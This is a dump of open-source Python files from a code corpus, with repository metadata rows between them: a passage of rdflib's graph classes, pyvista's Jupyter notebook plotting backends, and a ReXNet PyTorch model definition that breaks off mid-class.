result='sparql', initNs=None, initBindings=None,
use_store_provided=True, **kwargs):
"""
Query this graph.
A type of 'prepared queries' can be realised by providing
initial variable bindings with initBindings
Initial namespaces are used to resolve prefixes used in the query,
if none are given, the namespaces from the graph's namespace manager
are used.
:returntype: rdflib.query.QueryResult
"""
initBindings = initBindings or {}
initNs = initNs or dict(self.namespaces())
if hasattr(self.store, "query") and use_store_provided:
try:
return self.store.query(
query_object, initNs, initBindings,
self.default_union and
'__UNION__' or
self.identifier,
**kwargs)
except NotImplementedError:
pass # store has no own implementation
if not isinstance(result, query.Result):
result = plugin.get(result, query.Result)
if not isinstance(processor, query.Processor):
processor = plugin.get(processor, query.Processor)(self)
return result(processor.query(
query_object, initBindings, initNs, **kwargs))
def update(self, update_object, processor='sparql',
initNs=None, initBindings=None,
use_store_provided=True, **kwargs):
"""Update this graph with the given update query."""
initBindings = initBindings or {}
initNs = initNs or dict(self.namespaces())
if hasattr(self.store, "update") and use_store_provided:
try:
return self.store.update(
update_object, initNs, initBindings,
self.default_union and
'__UNION__' or
self.identifier,
**kwargs)
except NotImplementedError:
pass # store has no own implementation
if not isinstance(processor, query.UpdateProcessor):
processor = plugin.get(processor, query.UpdateProcessor)(self)
return processor.update(update_object, initBindings, initNs, **kwargs)
def n3(self):
"""return an n3 identifier for the Graph"""
return "[%s]" % self.identifier.n3()
def __reduce__(self):
return (Graph, (self.store, self.identifier,))
def isomorphic(self, other):
"""
does a very basic check if these graphs are the same
If no BNodes are involved, this is accurate.
See rdflib.compare for a correct implementation of isomorphism checks
"""
# TODO: this is only an approximation.
if len(self) != len(other):
return False
for s, p, o in self:
if not isinstance(s, BNode) and not isinstance(o, BNode):
if not (s, p, o) in other:
return False
for s, p, o in other:
if not isinstance(s, BNode) and not isinstance(o, BNode):
if not (s, p, o) in self:
return False
# TODO: very well could be a false positive at this point yet.
return True
def connected(self):
"""Check if the Graph is connected
The Graph is considered undirectional.
Performs a search on the Graph, starting from a random node. Then
iteratively goes depth-first through the triplets where the node is
subject and object. Return True if all nodes have been visited and
False if it cannot continue and there are still unvisited nodes left.
"""
all_nodes = list(self.all_nodes())
discovered = []
# take a random one, could also always take the first one, doesn't
# really matter.
if not all_nodes:
return False
visiting = [all_nodes[random.randrange(len(all_nodes))]]
while visiting:
x = visiting.pop()
if x not in discovered:
discovered.append(x)
for new_x in self.objects(subject=x):
if new_x not in discovered and new_x not in visiting:
visiting.append(new_x)
for new_x in self.subjects(object=x):
if new_x not in discovered and new_x not in visiting:
visiting.append(new_x)
# optimisation by only considering length, since no new objects can
# be introduced anywhere.
if len(all_nodes) == len(discovered):
return True
else:
return False
def all_nodes(self):
res = set(self.objects())
res.update(self.subjects())
return res
def collection(self, identifier):
"""Create a new ``Collection`` instance.
Parameters:
- ``identifier``: a URIRef or BNode instance.
Example::
>>> graph = Graph()
>>> uri = URIRef("http://example.org/resource")
>>> collection = graph.collection(uri)
>>> assert isinstance(collection, Collection)
>>> assert collection.uri is uri
>>> assert collection.graph is graph
>>> collection += [ Literal(1), Literal(2) ]
"""
return Collection(self, identifier)
def resource(self, identifier):
"""Create a new ``Resource`` instance.
Parameters:
- ``identifier``: a URIRef or BNode instance.
Example::
>>> graph = Graph()
>>> uri = URIRef("http://example.org/resource")
>>> resource = graph.resource(uri)
>>> assert isinstance(resource, Resource)
>>> assert resource.identifier is uri
>>> assert resource.graph is graph
"""
if not isinstance(identifier, Node):
identifier = URIRef(identifier)
return Resource(self, identifier)
def _process_skolem_tuples(self, target, func):
for t in self.triples((None, None, None)):
target.add(func(t))
def skolemize(self, new_graph=None, bnode=None, authority=None, basepath=None):
def do_skolemize(bnode, t):
(s, p, o) = t
if s == bnode:
s = s.skolemize(authority=authority, basepath=basepath)
if o == bnode:
o = o.skolemize(authority=authority, basepath=basepath)
return (s, p, o)
def do_skolemize2(t):
(s, p, o) = t
if isinstance(s, BNode):
s = s.skolemize(authority=authority, basepath=basepath)
if isinstance(o, BNode):
o = o.skolemize(authority=authority, basepath=basepath)
return (s, p, o)
retval = Graph() if new_graph is None else new_graph
if bnode is None:
self._process_skolem_tuples(retval, do_skolemize2)
elif isinstance(bnode, BNode):
self._process_skolem_tuples(
retval, lambda t: do_skolemize(bnode, t))
return retval
def de_skolemize(self, new_graph=None, uriref=None):
def do_de_skolemize(uriref, t):
(s, p, o) = t
if s == uriref:
s = s.de_skolemize()
if o == uriref:
o = o.de_skolemize()
return (s, p, o)
def do_de_skolemize2(t):
(s, p, o) = t
if isinstance(s, Genid):
s = s.de_skolemize()
if isinstance(o, Genid):
o = o.de_skolemize()
return (s, p, o)
retval = Graph() if new_graph is None else new_graph
if uriref is None:
self._process_skolem_tuples(retval, do_de_skolemize2)
elif isinstance(uriref, Genid):
self._process_skolem_tuples(
retval, lambda t: do_de_skolemize(uriref, t))
return retval
class ConjunctiveGraph(Graph):
"""
A ConjunctiveGraph is an (unnamed) aggregation of all the named
graphs in a store.
It has a ``default`` graph, whose name is associated with the
graph throughout its life. :meth:`__init__` can take an identifier
to use as the name of this default graph or it will assign a
BNode.
All methods that add triples work against this default graph.
All queries are carried out against the union of all graphs.
"""
def __init__(self, store='default', identifier=None):
super(ConjunctiveGraph, self).__init__(store, identifier=identifier)
assert self.store.context_aware, ("ConjunctiveGraph must be backed by"
" a context aware store.")
self.context_aware = True
self.default_union = True # Conjunctive!
self.default_context = Graph(store=self.store,
identifier=identifier or BNode())
def __str__(self):
pattern = ("[a rdflib:ConjunctiveGraph;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']]")
return pattern % self.store.__class__.__name__
def _spoc(self, triple_or_quad, default=False):
"""
helper method for having methods that support
either triples or quads
"""
if triple_or_quad is None:
return (None, None, None, self.default_context if default else None)
if len(triple_or_quad) == 3:
c = self.default_context if default else None
(s, p, o) = triple_or_quad
elif len(triple_or_quad) == 4:
(s, p, o, c) = triple_or_quad
c = self._graph(c)
return s, p, o, c
def __contains__(self, triple_or_quad):
"""Support for 'triple/quad in graph' syntax"""
s, p, o, c = self._spoc(triple_or_quad)
for t in self.triples((s, p, o), context=c):
return True
return False
def add(self, triple_or_quad):
"""
Add a triple or quad to the store.
if a triple is given it is added to the default context
"""
s, p, o, c = self._spoc(triple_or_quad, default=True)
_assertnode(s, p, o)
self.store.add((s, p, o), context=c, quoted=False)
def _graph(self, c):
if c is None:
return None
if not isinstance(c, Graph):
return self.get_context(c)
else:
return c
def addN(self, quads):
"""Add a sequence of triples with context"""
self.store.addN(
(s, p, o, self._graph(c)) for s, p, o, c in quads if
_assertnode(s, p, o)
)
def remove(self, triple_or_quad):
"""
Removes a triple or quads
if a triple is given it is removed from all contexts
a quad is removed from the given context only
"""
s, p, o, c = self._spoc(triple_or_quad)
self.store.remove((s, p, o), context=c)
def triples(self, triple_or_quad, context=None):
"""
Iterate over all the triples in the entire conjunctive graph
For legacy reasons, this can take the context to query either
as a fourth element of the quad, or as the explicit context
keyword parameter. The kw param takes precedence.
"""
s, p, o, c = self._spoc(triple_or_quad)
context = self._graph(context or c)
if self.default_union:
if context == self.default_context:
context = None
else:
if context is None:
context = self.default_context
if isinstance(p, Path):
if context is None:
context = self
for s, o in p.eval(context, s, o):
yield (s, p, o)
else:
for (s, p, o), cg in self.store.triples((s, p, o), context=context):
yield s, p, o
def quads(self, triple_or_quad=None):
"""Iterate over all the quads in the entire conjunctive graph"""
s, p, o, c = self._spoc(triple_or_quad)
for (s, p, o), cg in self.store.triples((s, p, o), context=c):
for ctx in cg:
yield s, p, o, ctx
def triples_choices(self, triple, context=None):
"""Iterate over all the triples in the entire conjunctive graph"""
s, p, o = triple
if context is None:
if not self.default_union:
context = self.default_context
else:
context = self._graph(context)
for (s1, p1, o1), cg in self.store.triples_choices((s, p, o),
context=context):
yield (s1, p1, o1)
def __len__(self):
"""Number of triples in the entire conjunctive graph"""
return self.store.__len__()
def contexts(self, triple=None):
"""Iterate over all contexts in the graph
If triple is specified, iterate over all contexts the triple is in.
"""
for context in self.store.contexts(triple):
if isinstance(context, Graph):
# TODO: One of these should never happen and probably
# should raise an exception rather than smoothing over
# the weirdness - see #225
yield context
else:
yield self.get_context(context)
def get_context(self, identifier, quoted=False):
"""Return a context graph for the given identifier
identifier must be a URIRef or BNode.
"""
return Graph(store=self.store, identifier=identifier,
namespace_manager=self)
def remove_context(self, context):
"""Removes the given context from the graph"""
self.store.remove((None, None, None), context)
def context_id(self, uri, context_id=None):
"""URI#context"""
uri = uri.split("#", 1)[0]
if context_id is None:
context_id = "#context"
return URIRef(context_id, base=uri)
def parse(self, source=None, publicID=None, format="xml",
location=None, file=None, data=None, **args):
"""
Parse source adding the resulting triples to its own context
(sub graph of this graph).
See :meth:`rdflib.graph.Graph.parse` for documentation on arguments.
:Returns:
The graph into which the source was parsed. In the case of n3
it returns the root context.
"""
source = create_input_source(
source=source, publicID=publicID, location=location,
file=file, data=data, format=format)
g_id = publicID and publicID or source.getPublicId()
if not isinstance(g_id, Node):
g_id = URIRef(g_id)
context = Graph(store=self.store, identifier=g_id)
context.remove((None, None, None)) # hmm ?
context.parse(source, publicID=publicID, format=format, **args)
return context
def __reduce__(self):
return (ConjunctiveGraph, (self.store, self.identifier))
DATASET_DEFAULT_GRAPH_ID = URIRef('urn:x-rdflib:default')
class Dataset(ConjunctiveGraph):
__doc__ = """
RDF 1.1 Dataset. Small extension to the Conjunctive Graph:
- the primary term is graphs in the datasets and not contexts with quads,
so there is a separate method to set/retrieve a graph in a dataset and
operate with graphs
- graphs cannot be identified with blank nodes
- added a method to directly add a single quad
Examples of usage:
>>> # Create a new Dataset
>>> ds = Dataset()
>>> # simple triples goes to default graph
>>> ds.add((URIRef('http://example.org/a'),
... URIRef('http://www.example.org/b'),
... Literal('foo')))
>>>
>>> # Create a graph in the dataset, if the graph name has already been
>>> # used, the corresponding graph will be returned
>>> # (ie, the Dataset keeps track of the constituent graphs)
>>> g = ds.graph(URIRef('http://www.example.com/gr'))
>>>
>>> # add triples to the new graph as usual
>>> g.add(
... (URIRef('http://example.org/x'),
... URIRef('http://example.org/y'),
... Literal('bar')) )
>>> # alternatively: add a quad to the dataset -> goes to the graph
>>> ds.add(
... (URIRef('http://example.org/x'),
... URIRef('http://example.org/z'),
... Literal('foo-bar'),g) )
>>>
>>> # querying triples return them all regardless of the graph
>>> for t in ds.triples((None,None,None)): # doctest: +SKIP
... print(t) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/a'),
rdflib.term.URIRef(u'http://www.example.org/b'),
rdflib.term.Literal(u'foo'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'))
>>>
>>> # querying quads return quads; the fourth argument can be unrestricted
>>> # or restricted to a graph
>>> for q in ds.quads((None, None, None, None)): # doctest: +SKIP
... print(q) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/a'),
rdflib.term.URIRef(u'http://www.example.org/b'),
rdflib.term.Literal(u'foo'),
None)
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
>>>
>>> for q in ds.quads((None,None,None,g)): # doctest: +SKIP
... print(q) # doctest: +NORMALIZE_WHITESPACE
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/y'),
rdflib.term.Literal(u'bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
(rdflib.term.URIRef(u'http://example.org/x'),
rdflib.term.URIRef(u'http://example.org/z'),
rdflib.term.Literal(u'foo-bar'),
rdflib.term.URIRef(u'http://www.example.com/gr'))
>>> # Note that in the call above -
>>> # ds.quads((None,None,None,'http://www.example.com/gr'))
>>> # would have been accepted, too
>>>
>>> # graph names in the dataset can be queried:
>>> for c in ds.graphs(): # doctest: +SKIP
... print(c) # doctest:
DEFAULT
http://www.example.com/gr
>>> # A graph can be created without specifying a name; a skolemized genid
>>> # is created on the fly
>>> h = ds.graph()
>>> for c in ds.graphs(): # doctest: +SKIP
... print(c) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
DEFAULT
http://rdlib.net/.well-known/genid/rdflib/N...
http://www.example.com/gr
>>> # Note that the Dataset.graphs() call returns names of empty graphs,
>>> # too. This can be restricted:
>>> for c in ds.graphs(empty=False): # doctest: +SKIP
... print(c) # doctest: +NORMALIZE_WHITESPACE
DEFAULT
http://www.example.com/gr
>>>
>>> # a graph can also be removed from a dataset via ds.remove_graph(g)
.. versionadded:: 4.0
"""
def __init__(self, store='default', default_union=False):
super(Dataset, self).__init__(store=store, identifier=None)
if not self.store.graph_aware:
raise Exception("DataSet must be backed by a graph-aware store!")
self.default_context = Graph(store=self.store, identifier=DATASET_DEFAULT_GRAPH_ID)
self.default_union = default_union
def __str__(self):
pattern = ("[a rdflib:Dataset;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']]")
return pattern % self.store.__class__.__name__
def graph(self, identifier=None):
if identifier is None:
from rdflib.term import rdflib_skolem_genid
self.bind(
"genid", "http://rdflib.net" + rdflib_skolem_genid,
override=False)
identifier = BNode().skolemize()
g = self._graph(identifier)
self.store.add_graph(g)
return g
def parse(self, source=None, publicID=None, format="xml",
location=None, file=None, data=None, **args):
c = ConjunctiveGraph.parse(self, source, publicID, format, location, file, data, **args)
self.graph(c)
return c
def add_graph(self, g):
"""alias of graph for consistency"""
return self.graph(g)
def remove_graph(self, g):
if not isinstance(g, Graph):
g = self.get_context(g)
self.store.remove_graph(g)
if g is None or g == self.default_context:
# default graph cannot be removed
# only triples deleted, so add it back in
self.store.add_graph(self.default_context)
def contexts(self, triple=None):
default = False
for c in super(Dataset, self).contexts(triple):
default |= c.identifier == DATASET_DEFAULT_GRAPH_ID
yield c
if not default:
yield self.graph(DATASET_DEFAULT_GRAPH_ID)
graphs = contexts
def quads(self, quad):
for s, p, o, c in super(Dataset, self).quads(quad):
if c.identifier == self.default_context:
yield (s, p, o, None)
else:
yield (s, p, o, c.identifier)
class QuotedGraph(Graph):
"""
Quoted Graphs are intended to implement Notation 3 formulae. They are
associated with a required identifier that the N3 parser *must* provide
in order to maintain consistent formulae identification for scenarios
such as implication and other such processing.
"""
def __init__(self, store, identifier):
super(QuotedGraph, self).__init__(store, identifier)
def add(self, triple):
"""Add a triple with self as context"""
s, p, o = triple
assert isinstance(s, Node), \
"Subject %s must be an rdflib term" % (s,)
assert isinstance(p, Node), \
"Predicate %s must be an rdflib term" % (p,)
assert isinstance(o, Node), \
"Object %s must be an rdflib term" % (o,)
self.store.add((s, p, o), self, quoted=True)
def addN(self, quads):
"""Add a sequence of triple with context"""
self.store.addN(
(s, p, o, c) for s, p, o, c in quads
if isinstance(c, QuotedGraph) and
c.identifier is self.identifier and
_assertnode(s, p, o)
)
def n3(self):
"""Return an n3 identifier for the Graph"""
return "{%s}" % self.identifier.n3()
def __str__(self):
identifier = self.identifier.n3()
label = self.store.__class__.__name__
pattern = ("{this rdflib.identifier %s;rdflib:storage "
"[a rdflib:Store;rdfs:label '%s']}")
return pattern % (identifier, label)
def __reduce__(self):
return (QuotedGraph, (self.store, self.identifier))
# Make sure QuotedGraph is ordered correctly
# wrt to other Terms.
# this must be done here, as the QuotedGraph cannot be
# circularily imported in term.py
rdflib.term._ORDERING[QuotedGraph] = 11
class Seq(object):
"""Wrapper around an RDF Seq resource
It implements a container type in Python with the order of the items
returned corresponding to the Seq content. It is based on the natural
ordering of the predicate names _1, _2, _3, etc, which is the
'implementation' of a sequence in RDF terms.
"""
def __init__(self, graph, subject):
"""Parameters:
- graph:
the graph containing the Seq
- subject:
the subject of a Seq. Note that the init does not
check whether this is a Seq, this is done in whoever
creates this instance!
"""
_list = self._list = list()
LI_INDEX = URIRef(str(RDF) + "_")
for (p, o) in graph.predicate_objects(subject):
if p.startswith(LI_INDEX): # != RDF.Seq: #
i = int(p.replace(LI_INDEX, ''))
_list.append((i, o))
# here is the trick: the predicates are _1, _2, _3, etc. Ie,
# by sorting the keys (by integer) we have what we want!
_list.sort()
def toPython(self):
return self
def __iter__(self):
"""Generator over the items in the Seq"""
for _, item in self._list:
yield item
def __len__(self):
"""Length of the Seq"""
return len(self._list)
def __getitem__(self, index):
"""Item given by index from the Seq"""
index, item = self._list.__getitem__(index)
return item
class ModificationException(Exception):
def __init__(self):
pass
def __str__(self):
return ("Modifications and transactional operations not allowed on "
"ReadOnlyGraphAggregate instances")
class UnSupportedAggregateOperation(Exception):
def __init__(self):
pass
def __str__(self):
return ("This operation is not supported by ReadOnlyGraphAggregate "
"instances")
class ReadOnlyGraphAggregate(ConjunctiveGraph):
"""Utility class for treating a set of graphs as a single graph
Only read operations are supported (hence the name). Essentially a
ConjunctiveGraph over an explicit subset of the entire store.
"""
def __init__(self, graphs, store='default'):
if store is not None:
super(ReadOnlyGraphAggregate, self).__init__(store)
Graph.__init__(self, store)
self.__namespace_manager = None
assert isinstance(graphs, list) \
and graphs \
and [g for g in graphs if isinstance(g, Graph)], \
"graphs argument must be a list of Graphs!!"
self.graphs = graphs
def __repr__(self):
return "<ReadOnlyGraphAggregate: %s graphs>" % len(self.graphs)
def destroy(self, configuration):
raise ModificationException()
# Transactional interfaces (optional)
def commit(self):
raise ModificationException()
def rollback(self):
raise ModificationException()
def open(self, configuration, create=False):
# TODO: is there a use case for this method?
for graph in self.graphs:
graph.open(self, configuration, create)
def close(self):
for graph in self.graphs:
graph.close()
def add(self, triple):
raise ModificationException()
def addN(self, quads):
raise ModificationException()
def remove(self, triple):
raise ModificationException()
def triples(self, triple):
s, p, o = triple
for graph in self.graphs:
if isinstance(p, Path):
for s, o in p.eval(self, s, o):
yield s, p, o
else:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1)
def __contains__(self, triple_or_quad):
context = None
if len(triple_or_quad) == 4:
context = triple_or_quad[3]
for graph in self.graphs:
if context is None or graph.identifier == context.identifier:
if triple_or_quad[:3] in graph:
return True
return False
def quads(self, triple):
"""Iterate over all the quads in the entire aggregate graph"""
s, p, o = triple
for graph in self.graphs:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1, graph)
def __len__(self):
return sum(len(g) for g in self.graphs)
def __hash__(self):
raise UnSupportedAggregateOperation()
def __cmp__(self, other):
if other is None:
return -1
elif isinstance(other, Graph):
return -1
elif isinstance(other, ReadOnlyGraphAggregate):
return cmp(self.graphs, other.graphs)
else:
return -1
def __iadd__(self, other):
raise ModificationException()
def __isub__(self, other):
raise ModificationException()
# Conv. methods
def triples_choices(self, triple, context=None):
subject, predicate, object_ = triple
for graph in self.graphs:
choices = graph.triples_choices((subject, predicate, object_))
for (s, p, o) in choices:
yield (s, p, o)
def qname(self, uri):
if hasattr(self, 'namespace_manager') and self.namespace_manager:
return self.namespace_manager.qname(uri)
raise UnSupportedAggregateOperation()
def compute_qname(self, uri, generate=True):
if hasattr(self, 'namespace_manager') and self.namespace_manager:
return self.namespace_manager.compute_qname(uri, generate)
raise UnSupportedAggregateOperation()
def bind(self, prefix, namespace, override=True):
raise UnSupportedAggregateOperation()
def namespaces(self):
if hasattr(self, 'namespace_manager'):
for prefix, namespace in self.namespace_manager.namespaces():
yield prefix, namespace
else:
for graph in self.graphs:
for prefix, namespace in graph.namespaces():
yield prefix, namespace
def absolutize(self, uri, defrag=1):
raise UnSupportedAggregateOperation()
def parse(self, source, publicID=None, format="xml", **args):
raise ModificationException()
def n3(self):
raise UnSupportedAggregateOperation()
def __reduce__(self):
raise UnSupportedAggregateOperation()
def _assertnode(*terms):
for t in terms:
assert isinstance(t, Node), \
'Term %s must be an rdflib term' % (t,)
return True
def test():
import doctest
doctest.testmod()
if __name__ == '__main__':
test()
| 34.425258 | 118 | 0.593082 |
4a27e703da09fdadff9171e305f9e3a2a96ed97a | 5,386 | py | Python | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | [
"MIT"
] | null | null | null | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | [
"MIT"
] | null | null | null | pyvista/jupyter/notebook.py | rohankumardubey/pyvista | ec5aa343d857d0c7e6a79aeeba340797bc868ced | [
"MIT"
] | null | null | null | """
Support dynamic or static jupyter notebook plotting.
Includes:
* ``ipyvtklink``
* ``panel``
"""
import warnings
import os
import numpy as np
# This module should not be imported at the __init__ level, only as a
# lazy import when trying to plot using jupyter notebooks
try:
import IPython
from IPython import display
except ImportError: # pragma: no cover
raise ImportError('Install IPython to display an image in a notebook')
from pyvista import _vtk
PANEL_EXTENSION_SET = [False]
def handle_plotter(plotter, backend=None, screenshot=None,
return_viewer=False, **kwargs):
"""Show the ``pyvista`` plot in a jupyter environment.
Parameters
----------
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
Returns
-------
IPython Widget
IPython widget when ``return_viewer==True``. Otherwise, ``None``.
"""
if screenshot is False:
screenshot = None
try:
if backend == 'ipyvtklink':
return show_ipyvtk(plotter, return_viewer)
if backend == 'panel':
return show_panel(plotter, return_viewer)
if backend == 'ipygany':
from pyvista.jupyter.pv_ipygany import show_ipygany
return show_ipygany(plotter, return_viewer, **kwargs)
except ImportError as e:
warnings.warn(f'Failed to use notebook backend: \n\n{e}\n\n'
'Falling back to a static output.')
return show_static_image(plotter, screenshot, return_viewer)
def show_static_image(plotter, screenshot, return_viewer):
"""Display a static image to be displayed within a jupyter notebook."""
import PIL.Image
if plotter.last_image is None:
# Must render here, otherwise plotter will segfault.
plotter.render()
plotter.last_image = plotter.screenshot(screenshot, return_img=True)
image = PIL.Image.fromarray(plotter.last_image)
# close plotter as this will be a static image and there is no
# point to keeping the plotter around.
plotter.close()
# Simply display the result: either ipyvtklink object or image display
if return_viewer:
return image
display.display(image)
def show_ipyvtk(plotter, return_viewer):
"""Display an interactive viewer widget using ``ipyvtklink``."""
if any('SPYDER' in name for name in os.environ):
warnings.warn('``use_ipyvtk`` is incompatible with Spyder.\n'
'Use notebook=False for interactive '
'plotting within spyder or disable it globally with:\n'
'pyvista.set_jupyter_backend(None)')
try:
from ipyvtklink.viewer import ViewInteractiveWidget
except ImportError: # pragma: no cover
raise ImportError('Please install `ipyvtklink` to use this feature: '
'https://github.com/Kitware/ipyvtklink')
# Have to leave the Plotter open for the widget to use
disp = ViewInteractiveWidget(plotter.ren_win, on_close=plotter.close,
transparent_background=plotter.image_transparent_background)
for renderer in plotter.renderers:
renderer.AddObserver(_vtk.vtkCommand.ModifiedEvent, lambda *args: disp.update_canvas())
if return_viewer:
return disp
display.display_html(disp)
def show_panel(plotter, return_viewer):
"""Take the active renderer(s) from a plotter and show them using ``panel``."""
try:
import panel as pn
except ImportError: # pragma: no cover
raise ImportError('Install ``panel`` to use this feature')
# check if panel extension has been set
if not PANEL_EXTENSION_SET[0]:
pn.extension('vtk')
PANEL_EXTENSION_SET[0] = True
# only set window size if explicitly set within the plotter
sizing = {}
if not plotter._window_size_unset:
width, height = plotter.window_size
sizing = {'width': width,
'height': height}
axes_enabled = plotter.renderer.axes_enabled
pan = pn.panel(plotter.ren_win,
sizing_mode='stretch_width',
orientation_widget=axes_enabled,
enable_keybindings=False, **sizing)
# if plotter.renderer.axes_enabled:
# pan.axes = build_panel_axes()
if hasattr(plotter.renderer, 'cube_axes_actor'):
pan.axes = build_panel_bounds(plotter.renderer.cube_axes_actor)
if return_viewer:
return pan
display.display_html(pan)
def build_panel_bounds(actor):
"""Build a panel bounds actor using the plotter cube_axes_actor."""
bounds = {}
n_ticks = 5
if actor.GetXAxisVisibility():
xmin, xmax = actor.GetXRange()
bounds['xticker'] = {'ticks': np.linspace(xmin, xmax, n_ticks)}
if actor.GetYAxisVisibility():
ymin, ymax = actor.GetYRange()
bounds['yticker'] = {'ticks': np.linspace(ymin, ymax, n_ticks)}
if actor.GetZAxisVisibility():
zmin, zmax = actor.GetZRange()
bounds['zticker'] = {'ticks': np.linspace(zmin, zmax, n_ticks)}
bounds['origin'] = [xmin, ymin, zmin]
bounds['grid_opacity'] = 0.5
bounds['show_grid'] = True
bounds['digits'] = 3
bounds['fontsize'] = actor.GetLabelTextProperty(0).GetFontSize()
return bounds
| 32.059524 | 95 | 0.657631 |
4a27e81efe57fc33ebb3711a55ff640c858c9263 | 6,282 | py | Python | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | [
"MIT"
] | null | null | null | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | [
"MIT"
] | null | null | null | rexnet/rexnet.py | cymqqqq/AI-research | b344667adc217959abe314a3a5b08206a533222d | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from math import ceil
USE_MEMORY_EFFICIENT_SiLU = True
if USE_MEMORY_EFFICIENT_SiLU:
@torch.jit.script
def silu_fwd(x):
return x.mul(torch.sigmoid(x))
@torch.jit.script
def silu_bwd(x, grad_output):
x_sigmoid = torch.sigmoid(x)
return grad_output * (x_sigmoid * (1. + x * (1. - x_sigmoid)))
class SiLUJitImplementation(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return silu_fwd(x)
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_tensors[0]
return silu_bwd(x, grad_output)
def silu(x, inplace=False):
return SiLUJitImplementation.apply(x)
else:
def silu(x, inplace=False):
return x.mul_(x.sigmoid()) if inplace else x.mul(x.sigmoid())
class SiLU(nn.Module):
def __init__(self, inplace=True):
super(SiLU, self).__init__()
self.inplace = inplace
def forward(self, x):
return silu(x, self.inplace)
def ConvBNAct(out, in_channels, channels, kernel=1, stride=1, pad=0,
num_group=1, active=True, relu6=False):
out.append(nn.Conv2d(in_channels, channels, kernel,
stride, pad, groups=num_group, bias=False))
out.append(nn.BatchNorm2d(channels))
if active:
out.append(nn.ReLU6(inplace=True) if relu6 else nn.ReLU(inplace=True))
def ConvBNSiLU(out, in_channels, channels, kernel=1, stride=1, pad=0, num_group=1):
out.append(nn.Conv2d(in_channels, channels, kernel,
stride, pad, groups=num_group, bias=False))
out.append(nn.BatchNorm2d(channels))
out.append(SiLU(inplace=True))
class SE(nn.Module):
def __init__(self, in_channels, channels, se_ratio=12):
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(in_channels, channels // se_ratio, kernel_size=1, padding=0),
nn.BatchNorm2d(channels // se_ratio),
nn.ReLU(inplace=True),
nn.Conv2d(channels // se_ratio, channels, kernel_size=1, padding=0),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.fc(y)
return x * y
class LinearBottleneck(nn.Module):
def __init__(self, in_channels, channels, t, stride, use_se=True, se_ratio=12,
**kwargs):
super(LinearBottleneck, self).__init__(**kwargs)
self.use_shortcut = stride == 1 and in_channels <= channels
self.in_channels = in_channels
self.out_channels = channels
out = []
if t != 1:
dw_channels = in_channels * t
ConvBNSiLU(out, in_channels=in_channels, channels=dw_channels)
else:
dw_channels = in_channels
ConvBNAct(out, in_channels=dw_channels, channels=dw_channels, kernel=3, stride=stride, pad=1,
num_group=dw_channels, active=False)
if use_se:
out.append(SE(dw_channels, dw_channels, se_ratio))
out.append(nn.ReLU6())
ConvBNAct(out, in_channels=dw_channels, channels=channels, active=False, relu6=True)
self.out = nn.Sequential(*out)
def forward(self, x):
out = self.out(x)
if self.use_shortcut:
out[:, 0:self.in_channels] += x
return out
class ReXNetV1(nn.Module):
def __init__(self, input_ch=16, final_ch=180, width_mult=1.0, depth_mult=1.0, classes=1000,
use_se=True,
se_ratio=12,
dropout_ratio=0.2,
bn_momentum=0.9):
super(ReXNetV1, self).__init__()
layers = [1, 2, 2, 3, 3, 5]
strides = [1, 2, 2, 2, 1, 2]
use_ses = [False, False, True, True, True, True]
layers = [ceil(element * depth_mult) for element in layers]
strides = sum([[element] + [1] * (layers[idx] - 1)
for idx, element in enumerate(strides)], [])
if use_se:
use_ses = sum([[element] * layers[idx] for idx, element in enumerate(use_ses)], [])
else:
use_ses = [False] * sum(layers[:])
ts = [1] * layers[0] + [6] * sum(layers[1:])
self.depth = sum(layers[:]) * 3
stem_channel = 32 / width_mult if width_mult < 1.0 else 32
inplanes = input_ch / width_mult if width_mult < 1.0 else input_ch
features = []
in_channels_group = []
channels_group = []
# The following channel configuration is a simple instance to make each layer become an expand layer.
for i in range(self.depth // 3):
if i == 0:
in_channels_group.append(int(round(stem_channel * width_mult)))
channels_group.append(int(round(inplanes * width_mult)))
else:
in_channels_group.append(int(round(inplanes * width_mult)))
inplanes += final_ch / (self.depth // 3 * 1.0)
channels_group.append(int(round(inplanes * width_mult)))
ConvBNSiLU(features, 3, int(round(stem_channel * width_mult)), kernel=3, stride=2, pad=1)
for block_idx, (in_c, c, t, s, se) in enumerate(zip(in_channels_group, channels_group, ts, strides, use_ses)):
features.append(LinearBottleneck(in_channels=in_c,
channels=c,
t=t,
stride=s,
use_se=se, se_ratio=se_ratio))
pen_channels = int(1280 * width_mult)
ConvBNSiLU(features, c, pen_channels)
features.append(nn.AdaptiveAvgPool2d(1))
self.features = nn.Sequential(*features)
self.output = nn.Sequential(
nn.Dropout(dropout_ratio),
nn.Conv2d(pen_channels, classes, 1, bias=True))
